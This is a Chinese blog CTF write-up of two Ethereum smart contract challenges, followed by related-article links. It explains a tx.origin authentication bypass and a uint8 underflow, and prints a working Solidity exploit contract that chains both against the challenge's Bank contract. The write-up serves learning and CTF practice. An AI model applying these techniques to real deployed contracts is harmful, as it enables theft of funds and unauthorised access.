合约安全实战两则

最新推荐文章于 2022-04-27 13:18:46 发布
最新推荐文章于 2022-04-27 13:18:46 发布
阅读量469 收藏
点赞数 3
分类专栏: 以太合约安全系列 文章标签: 信息安全 安全 区块链 智能合约
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoyue2019/article/details/107832611
版权

1. [智能合约? 那是啥]

//0x202E653dA93c2a06076FC95B0A07E39B6003C5f6 Ropsten

pragma solidity ^0.4.23;

/**
 * The CoinFlip contract does nothing...
 */
contract CoinFlip {
	uint256 lashHash;
	uint256 Factor = 20244007718664171871063861089;
    	mapping (address => uint) balances;
   	string flag;

	constructor (string _flag) public {
		flag = _flag;
	}
	
	function getBalance () public returns(uint) {
		return balances[tx.origin];
	}
	
	function flip(bool _guess) public returns (bool) {
		uint256 blockValue = uint256(block.blockhash(block.number - 1));
		lashHash = blockValue;
		uint256 ans = blockValue / Factor;
		bool side = ans == 1 ? true : false;

		if (side == _guess) {
			balances[tx.origin]++;
			return true;
		} else {
			balances[tx.origin] = 0;
			return false;
		}
	}

	function GetTheFlag() public view returns (string){
		return flag;  // You can get your flag here
	}
}

这个好像是某题改过来的。改成了签到题。 原题不能直接getflag。 现在这样直接调用GetTheFlag或者去浏览器上查看合约创建时对内存的写入就能知道flag是啥。

控制台调用

微信截图_20200805230056.png

浏览器查看

火柴截图20200806075237956.jpg

要是所有题都这么纯真该多好~

2. [现在来做运算吧]

pragma solidity ^0.4.23;

/**
 * The Bank contract does something...
 */
contract Bank {
	bytes32 private pass = "*******";
	mapping (address => bool) unlock;
	mapping (address => uint8) balances;
	event FLAG(string b64email, string slogan);
	
	function GetBalance(address _address) view returns(uint) {
		require(msg.sender == _address);
		return balances[_address];
	}

	function GetLockedState(address _address) view returns(bool) {
		require(msg.sender == _address);
		return unlock[msg.sender];
	}

	modifier NeedPass(bytes32 _pass) { 
		require (pass == _pass); 
		_;  
	}

	function Deposit(address _to, uint8 _value, bytes32 _pass) public payable NeedPass(_pass) {
		require(_value > 5);
		balances[_to] += _value;
		if (balances[_to] == 5) {
			unlock[msg.sender] = true;
		}
	}
	
	function DrawBack(uint8 _value, bytes32 _pass) public payable NeedPass(_pass) {
		require(balances[msg.sender] >= _value);
		balances[msg.sender] -= _value;
	}

	function Transfer(address _to, uint8 _value, bytes32 _pass) public payable NeedPass(_pass) {
		require(balances[msg.sender] - _value >= 0);
		balances[msg.sender] -= _value;
		balances[_to] += _value;
	}

	function GetTheFlag(string b64email) public{
		require(tx.origin != msg.sender);
		require(unlock[msg.sender] == true);
		emit FLAG(b64email, " You got the flag!!");
	}
}

当时这题看了蛮久,因为对合约安全整体还不够熟悉,不能将多个漏洞融合贯通。这里简单记录一下用到的两个bypass点。

  1. tx.origin的鉴权漏洞 tx.origin是Solidity的一个全局变量,它遍历整个调用栈并返回最初发送调用(或事务)的帐户的地址。他和msg.send的不同就是tx.origin会遍历整个调用栈。下图可简单说明这种漏洞危害性。

火柴截图20200806080144579.jpg

类似于一个简单的中间人攻击。当用户call我们攻击者的攻击函数,而攻击者使用这个函数去调用正常合约时tx.origin == owner是成立的。也就绕过了鉴权。

  2.溢出和下溢 在solidity中,uint8代表255位的无符号整型,这里可以查看俺之前的日记:solidity类型。因为uint是无符号的整型,不能为负数。当+上超过这个数值的数时,就会出现溢出。例如254 + 2 = 1。而下溢则是0 - 1 = 255。

有了这些基础再来看题目就比较容易理解了。

require(tx.origin != msg.sender);
require(unlock[msg.sender] == true);
  1. 通过合约调用函数的方式,使得tx.origin还是我们的地址,而msg.sender是合约地址,不相等,pass。
  2. 唯一的unlock操作在Deposit函数中,需要存入大于5的数但最终值是5。这里有两种方法。如果没有对存入value限制,应该可以直接存入271,这是大于5而因为mapping中用uint8存储的value所以会溢出成为5。但是这里传入value也是uint8,所以溢出没戏,只能通过transfer函数使得value下溢。exp如下。
//author:肖越
pragma solidity >=0.4.23 <0.6.0;
import "./vul.sol";

contract exp{
    Bank bank = Bank(0x63266aaf6bdF3076a02D49eB73aE847cfd0A945c);
    function getflag() public payable {
        exp1();
        exp2();
        flag();
    }

    function exp1()public payable{
        bank.Transfer.value(msg.value)(0x11767c122Dd7B9F0F3e97a195f0CBA0a64c0C9c6,10,0x546831735f31735f6e30745f615f70617373212079696e6779696e6779696e67); 
    }
    function exp2() {
        bank.Deposit.value(msg.value)(this,15,0x546831735f31735f6e30745f615f70617373212079696e6779696e6779696e67);
    }
    function flag() {
        bank.GetTheFlag("lu ben wei nb!");
    }
}

火柴截图20200806083146217.jpg

(getflag函数不用传参,上图测试用的) 去看看transactionHash的详细内容

火柴截图20200806083352894.jpg

因为我测试过了,接收不到flag邮件,那么达到event就算成功了。 就致敬一波卢姥爷吧!

第12届全国大学生信息安全竞赛线上初赛Misc杂项 Write Up
AugenStern的博客
08-19 946
Misc杂项题目签到saleae24cusbaspDaysBank 题目 赛题类型主要包括:逆向、漏洞挖掘与利用、Web 渗透、密码、隐写、安全编程等类别,考察参赛者不同维度的网络安全理论、技术水平。 签到 下载附件后,看到readme.txt打开后提示会有摄像头,打开qiandao.exe,解压并运行软件,对准两个聚焦圆圈,回车输出 flag。 saleae 题目名saleae,是一个逻辑分析工具,不仅可以记录数字和模拟两种信号,还可以解码 SPI、I2C、串行、1-Wire、CAN、Mancheste
智能合约开发实战——元交易(Metatransaction)系列二,元交易合约的实现
shengzang1998的博客
11-11 9345
引言 上文中提到,普通的 ETH 交易并不能够做到让用户无需 gas 费,需要交易中嵌套一个交易,即元交易,来实现免 gas 费。 本文将分析开源库 OpenZeppelin/openzeppelin-contracts 中的元交易合约的实现,让你能够快速入门元交易实现细节,从而能够自己对后续更多的相关技术深入探索。 前置知识概述 元交易会涉及到 ECDSA 与 EIP712 等知识,如果你是熟手,可以跳过此节内容,直接浏览具体实现分析部分。 Hash 也称哈希、散列、数字摘要。通过哈希函数,可以将长短不一
区块链合约安全系列(一)公链合约权限校验引发的严重安全问题
BSN_yanxishe的博客
04-27 710
id:BSN_2021 公众号:BSN研习社 背景:由于公链环境下所有的信息都是共享的,智能合约相当于是透明的,任何人只需知道其地址就可以调用内部的方法,所以开发者在开发合约时,逻辑判断一般会添加一下权限的校验,以提高其安全性。但是有时候对其了解不深,会带来一些潜在的隐藏bug。 目标:验证当合约内部使用 tx.origin 做权限校验时,攻击者可以绕过逻辑约束进行资金盗取。 对象:适用于用Solidity语言开发的智能合约,例如BSN中的武汉链(基于ETH)和泰安链(基于 fisco b
如何写安全智能合约
DDFFR的博客
08-18 3270
Solidity was started in October 2014 when neither the Ethereum network nor the virtual machine had any real-world testing, the gas costs at that time were even drastically different from what they are
几道CTF题的writeup
蚁景网安学院
08-27 2608
0x01 PlainR2B这是一道比较简单的PWN题目,首先拖到IDA里简单看了一下程序,如图发现在读取,没有栈保护,所以,在read0x34时,可能替换game返回址址,先通过writ...
智能合约安全(一):以太坊机制及安全问题
热门推荐
Exploit的小站~
09-26 3万+
在本系列中,我们将对以太坊现有的安全问题和前沿的各类型漏洞挖掘方法进行综述。本文是本系列的第一篇文章,主要介绍以太坊的机制和存在的安全问题的分类。 01 什么是以太坊智能合约? 以太坊智能合约基于区块链(Blockchain)技术,作为一种旨在以信息化方式传播、验证或执行的计算机协议,为各类分布式应用服务提供了基础。简单来讲:如果把比特币看作是分布式的记账本;以太坊便是可以运行程序的分布式计算平台,程序运行的基础则是Solidity智能合约智能合约早在1995年就由尼克萨博提出,
201806 智能合约安全之形式化验证研究报告.pdf
06-27
### 智能合约安全之形式化验证研究报告 #### 一、智能合约安全领域分类——智能合约安全的分类 智能合约安全方面的措施大致可以分为以下几类:合约开发模板、合约审计、智能合约语言设计以及赏金猎人机制。 1. **...
区块链实战(3):用Solidity实现投票智能合约
06-09
在本课程中,我们将深入探讨如何使用Solidity这一专门用于以太坊区块链的编程语言来构建一个具有投票...这个课程中的"区块链实战(3)_用Solidity实现投票智能合约"资料将为你提供更详细的指导,帮助你掌握这些技能。
智能合约实战技术50问
11-21
### 智能合约实战技术知识点解析 #### 1. Java 开发智能合约与方法接口的理解 - **Java 开发智能合约**:虽然Solidity是目前最常用的智能合约开发语言,但通过某些工具如Web3j,我们可以将智能合约转换为Java对象...
以太坊智能合约 —— 最佳安全开发指南.pdf
08-29
为了使语句表达更加贴切,个别地方未按照原文逐字逐句...这篇文档旨在为Solidity开发人员提供一些智能合约安全准则(security baseline)。当然也包括智能合约安全开发理念、bug赏金计划指南、文档例程以及工具。
HCTF-2018-Official-Writeup
qq_24966613的博客
11-14 4860
HCTF 2018 Official WriteupSimplified Chinese VersionWebWarmupweb签到首先打开然后看F12啦,注释里提示是source.php,php审计,问题出在page=urldecode(_page = urldecode(p​age=urldecode(page); $_page = mb_substr( page,&amp;amp;amp;lt;spancl...
solidity之msg.sender总结(一个实时变化的变量)
weixin_43343144的博客
04-02 9813
务必注意:msg.sender是一个实时变化的变量!在合约中,方法的调用者不一样,msg.sender就会不一样! pragma solidity >=0.5.0 <0.7.0; import "../../node_modules/openzeppelin-solidity/contracts/token/ERC20/ERC20.sol"; contract TestTok...
合约安全之重入攻击
xiaoyue2019的博客
07-29 1254
还记得当年的ZheDao事件,硬是让以太坊硬分叉造就了以太经典ETC。 一个月就筹集了1个多亿刀的以太啊,想都不敢想。 16年那会,要是俺就接触了合约安全多好~哈哈。那不早就财富自由了… 要学习重入攻击,需要了解如下几个基本概念 什么是gas、gas limit、gas price 什么是fallback回退函数 什么是transfer、send、call 1.gas 以太坊在区块链上实现了一个运行环境,被称为以太坊虚拟机(EVM)。每个参与到网络的节点都会运行都会运行EVM作为区块验证协议的一部分
智能合约安全问题
张童鞋
11-03 8686
前言本文主要总结以太坊智能合约安全漏洞。新加坡国立大学的Loi Luu提出了现在的智能合约存在的几种安全漏洞1。然而,由于智能合约目前还只是初级阶段,相信各种安全问题会不断的发现。智能合约中的安全漏洞交易顺序依赖合约交易顺序依赖就是智能合约的执行随着当前交易处理的顺序不同而产生差异。例如,有两个交易T[i]和T[j],两个区块链状态S[1]和S[2],并且S[1]状态处理完交易T[j]后才能转化为
以太坊智能合约安全入门了解一下(下)
omnispace的博客
05-29 4515
作者:RickGray作者博客:http://rickgray.me/2018/05/26/ethereum-smart-contracts-vulnerabilities-review-part2/(注:本文分上/下两部分完成,上篇链接《以太坊智能合约安全入门了解一下(上)》) 接上篇3. Arithmetic Issues算数问题?通常来说,在编程语言里算数问题导致的漏洞最多的就是整数溢出了,...
区块链安全学习笔记
biziwaiwai的博客
05-29 2438
参考:https://www.anquanke.com/post/id/145458以太坊智能合约安全入门https://xiaozhuanlan.com/topic/7921803456区块链技术一、Fallback函数:官方解释:A contract can have exactly oneunnamed function. This function cannot have argument...
智能合约安全审计指南
05-30 5024
译者注:智能合约代码的审计,目前还不是技术社区内经常会讨论的主题。今年3月6日,发表在博客网站【Schneier on Security】上的一篇博客(原文链接:【https://www.schneier.com/blog/archives/2018/03/security_vulner_13.html】,原文中附有一篇专业的研究报告【Finding The Greedy, Prodigal, a...
以太坊一些脆弱性问题学习笔记2
weixin_42127015的博客
07-02 535
1,类型转换错误如果从一个合约到另一个合约的函数的直接调用的参数被错误地键入,或者被调用的合约的地址不正确,则不会发生任何事情,或者执行错误的代码。在任何情况下都不会抛出异常,并且调用者不知道。function sendEther(address recipient) internal { recipient.transfer(this.balance);}始终检查函数的参数是否为有效变量。如果它...
智能合约安全指南:自动化工具与实战演练
总结来说,本材料涵盖了智能合约安全性的重要性、自动化工具的类型及其作用、以及如何通过理论学习和实践操作来提升开发者的技能。这些知识对于希望在区块链领域工作的开发者来说是必不可少的,尤其是在编写智能合约...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值